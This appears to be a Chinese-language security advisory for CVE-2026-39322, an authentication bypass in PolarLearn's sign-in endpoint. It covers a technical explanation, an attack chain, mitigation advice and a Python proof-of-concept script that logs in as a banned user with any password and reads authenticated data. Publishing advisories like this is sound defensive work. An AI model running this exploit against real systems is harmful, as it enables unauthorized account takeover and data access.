CVE-2026-39322 PolarLearn身份验证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-39322

漏洞类型

身份验证绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PolarLearn

漏洞概述

PolarLearn 0-PRERELEASE-15及更早版本存在严重的身份验证绕过漏洞。由于`POST /api/v1/auth/sign-in`接口在验证提供的密码之前，就为被封禁的账户创建了有效的用户会话。攻击者可利用此逻辑缺陷，无需知道被封禁账户的正确密码，即可获取有效会话令牌，进而访问所有经过身份验证的API路由，获取敏感数据或执行任意操作。

技术细节

该漏洞的核心在于登录验证逻辑的时序错误。在受影响版本的PolarLearn中，处理登录请求的代码首先初始化并创建了一个Session对象，随后才对用户提交的密码进行校验以及检查账户状态（如是否被封禁）。由于会话在验证失败前已经生成并可能已被返回给客户端，攻击者可以利用这一机制。具体利用方式为：攻击者向`/api/v1/auth/sign-in`端点发送POST请求，填入目标被封禁账户的用户名和任意错误的密码。服务器端因逻辑缺陷，在密码验证失败前已确立了会话上下文，导致响应中包含了有效的认证信息（如Session Cookie或Token）。攻击者利用该凭证即可绕过密码验证和封禁限制，以该用户身份调用后台API接口。

攻击链分析

STEP 1

信息收集

攻击者识别目标使用的是PolarLearn平台，并枚举出一个被封禁的用户名。

STEP 2

发送恶意请求

攻击者向`/api/v1/auth/sign-in`端点发送POST请求，包含被封禁的用户名和任意密码。

STEP 3

获取会话

由于服务器在验证密码前创建了会话，攻击者从响应中获取有效的Session ID或Cookie。

STEP 4

利用会话

攻击者使用获取的会话凭证访问受保护的API接口，读取数据或执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_polarlearn(target_url, banned_username):
    """
    PoC for CVE-2026-39322
    Exploits authentication bypass by creating a session before password verification.
    """
    login_endpoint = f"{target_url}/api/v1/auth/sign-in"
    
    # Payload with the banned username and an arbitrary password
    payload = {
        "username": banned_username,
        "password": "does_not_matter"
    }

    try:
        # Send login request
        response = requests.post(login_endpoint, json=payload)
        
        if response.status_code == 200:
            print("[+] Session created successfully for banned user.")
            
            # Extract cookies (session)
            session_cookies = response.cookies
            
            # Verify access by calling an authenticated API
            # Example endpoint: /api/v1/user/profile
            verify_url = f"{target_url}/api/v1/user/profile"
            verify_response = requests.get(verify_url, cookies=session_cookies)
            
            if verify_response.status_code == 200:
                print("[+] Successfully accessed authenticated data:")
                print(verify_response.text)
            else:
                print("[-] Failed to access authenticated endpoint.")
        else:
            print(f"[-] Login request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://localhost:3000" # Replace with actual target
    user = "banned_admin"           # Replace with actual banned username
    exploit_polarlearn(target, user)

影响范围

PolarLearn <= 0-PRERELEASE-15

防御指南

临时缓解措施

建议管理员暂时禁用受影响版本的登录功能，直到应用补丁。对于现有系统，应检查服务器端日志，查找是否存在异常的登录成功记录（即被封禁账户的登录尝试）。在网络层面，可限制对`/api/v1/auth/sign-in`接口的访问频率，以减少自动化攻击的风险。